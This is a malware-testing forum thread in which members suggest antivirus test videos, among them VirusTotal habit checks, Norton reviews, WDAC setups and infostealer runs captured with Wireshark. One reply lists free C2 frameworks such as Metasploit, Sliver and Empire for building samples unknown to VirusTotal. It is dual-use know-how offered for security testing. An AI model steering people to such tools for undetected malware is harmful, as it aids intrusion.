Make your video test requests!

Shadowra

Level 37
Thread author
Verified
Top Poster
Content Creator
Malware Tester
Well-known
Sep 2, 2021
2,630
I have a fabulous idea.

How about a vid of Windows default security. With a folder of executable's and URLs on the desktop for testing. This time though trying something so simple. Upload each executable to Virus Total, if its flagged, you delete the sample, same with the URLs, instead of navigating to them directly, copy the URL and upload it to VT if its flagged, the same it gets deleted, then scan the system at the end with MD.
I like your idea :)
But I can scan the entire vm with MD but I can also infect it and see if it knows how to fix it, right? :)

On the other hand, I'm going to have to find some malware not known to VirusTotal
 

ShenguiTurmi

Level 3
Well-known
Feb 28, 2023
126
I like your idea :)
But I can scan the entire vm with MD but I can also infect it and see if it knows how to fix it, right? :)

On the other hand, I'm going to have to find some malware not known to VirusTotal
Completely unknown sample? For simulating targeted attacks?
You can do it yourself, although CobaltStrike is expensive, but there are many free alternatives.
MetaSploit+Venom/NimLoader, PoshC2, Sliver, Nimbo-C2, Empire are all free.
Most of the IDC I have contacted have a positive and supportive attitude towards this attack simulation test, so as long as you contact the IDC/VPS supplier in advance, they will not oppose you to do so, and if you accidentally leak the sample to the Internet, they will help you block some abuse complaints that are not clear.
 

likeastar20

Level 9
Verified
Mar 24, 2016
423
I like your idea :)
But I can scan the entire vm with MD but I can also infect it and see if it knows how to fix it, right? :)

On the other hand, I'm going to have to find some malware not known to VirusTotal
I often help people remove malware, maybe you could do some tests where you infect the machine with malware and then enable protection. It would be fun to see who is good at disinfecting a machine. I suppose AVs that have rollback would do better?
 

Shadowra

Level 37
Thread author
Verified
Top Poster
Content Creator
Malware Tester
Well-known
Sep 2, 2021
2,630
I often help people remove malware, maybe you could do some tests where you infect the machine with malware and then enable protection. It would be fun to see who is good at disinfecting a machine. I suppose AVs that have rollback would do better?

This kind of off-series video is planned :)
 
F

ForgottenSeer 109138

I like your idea :)
But I can scan the entire vm with MD but I can also infect it and see if it knows how to fix it, right? :)

On the other hand, I'm going to have to find some malware not known to VirusTotal
1. The point is to use good habits and see how it fairs, not can one mess s machine up and see it it fixes itself.

2. That's the same as having to hand pick malware that will bypass any product you test and see if it fails.

Thank you for making my point.
 

Jonny Quest

Level 22
Verified
Top Poster
Well-known
Mar 2, 2023
1,156
1. The point is to use good habits and see how it fairs, not can one mess s machine up and see it it fixes itself.
Good point, as if a person hypothetically let themselves get to that point, what irreversible damage (or stolen data) may have occurred that would require a complete Windows reinstall/reset that an AV couldn't repair?

Maybe continue testing for prevention. Let alone what was mentioned a day or two ago about testing combinations of AVs and other security apps could keep Shadowra busy for years with the possible 425 different combinations :oops:
 
F

ForgottenSeer 109138

Good point, as if a person hypothetically let themselves get to that point, what irreversible damage (or stolen data) may have occurred that would require a complete Windows reinstall/reset that an AV couldn't repair?

Maybe continue testing for prevention. Let alone what was mentioned a day or two ago about testing combinations of AVs and other security apps could keep Shadowra busy for years with the possible 425 different combinations :oops:
Rather the point being if a person "intentionally" messes up their machine to see if it repairs itself.

With admin privileges and malicious intentions a user could give their OS and just about any product a bad day.

I just want to see a test of a machine where the user has good habits, uploads all unknown and known downloads and urls to VT when unsure, how they would fair.

Not a set for failure video, hand picking it's doom. A legit in the wild not POC or handpicked, good habit video.
 
A

Azazel

I would like to see WHHLight, WDAC only, Super Safe setup against executables (.sys, .exe, .com, .dll, .ocx, .msi, .mst, .msp, .appx, .scr, .wsf, .tmp)
 
  • Like
Reactions: Shadowra

BSONE

Level 2
Feb 17, 2024
79
Any chance of doing an updated Norton review? I would be curious to see how Sonar Behavioral protection works these days. It would be interesting to see if any benefits from their acquisitions of Avira and Avast are flowing through to their Norton Antivirus product
 

Shadowra

Level 37
Thread author
Verified
Top Poster
Content Creator
Malware Tester
Well-known
Sep 2, 2021
2,630
I second that norton should be tested as it appears no one has tested them recently.
Any chance of doing an updated Norton review? I would be curious to see how Sonar Behavioral protection works these days. It would be interesting to see if any benefits from their acquisitions of Avira and Avast are flowing through to their Norton Antivirus product

Yep :)
 

TuxTalk

Level 14
Verified
Top Poster
Well-known
Nov 9, 2022
650
Any chance of doing an updated Norton review? I would be curious to see how Sonar Behavioral protection works these days. It would be interesting to see if any benefits from their acquisitions of Avira and Avast are flowing through to their Norton Antivirus product
Nothing new, still the same as before, Norton is very solid and recommendable.
 

likeastar20

Level 9
Verified
Mar 24, 2016
423

Attachments

  • Screenshot_30-3-2024_172857_euce1-110-nfr.sentinelone.net.jpeg
    Screenshot_30-3-2024_172857_euce1-110-nfr.sentinelone.net.jpeg
    1.6 MB · Views: 101
  • Like
Reactions: Shadowra

Shadowra

Level 37
Thread author
Verified
Top Poster
Content Creator
Malware Tester
Well-known
Sep 2, 2021
2,630
  • Like
Reactions: ShenguiTurmi
F

ForgottenSeer 109138

How about a good habit vs security test.

I will link a video below I recently posted for a how to extract the proof you would need.

Grab a copy of wireshark and place it in your test machine. Grab some "rats" or aka "infostealers" to test against for the desktop folder. Create fake credentials through out the test system in the browser, notepad ect. This time instead of static testing, make this a dynamic test only. Start wireshark before you start the test thus creating a pcap "packet capture" of the entire test. Execute each sample, giving some space "time intervals" in between each one, to see if the product not only stops the infection, but at the end, you will be able to use the pcap from wireshark to see if the product actually stopped it in time before information was leaked, thus saving the user from themselves since most of these are done via phishing emails. Knowledge, common sense and good habits vs security, video to see which would spare a user his/her credentials.

Post in thread 'What are you Browsing Now?' What are you Browsing Now?
 
Last edited by a moderator:

Shadowra

Level 37
Thread author
Verified
Top Poster
Content Creator
Malware Tester
Well-known
Sep 2, 2021
2,630
Hello :)

Here are the 3 tests I'll be publishing at the beginning of next week (it's starting to get nice in my house, so I'm resting a bit ^^ )

I'll get back to you as soon as these 3 videos are out. Note that I updated my recording software, the image will be better ;)

Enjoy! :D

rush.png
 

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top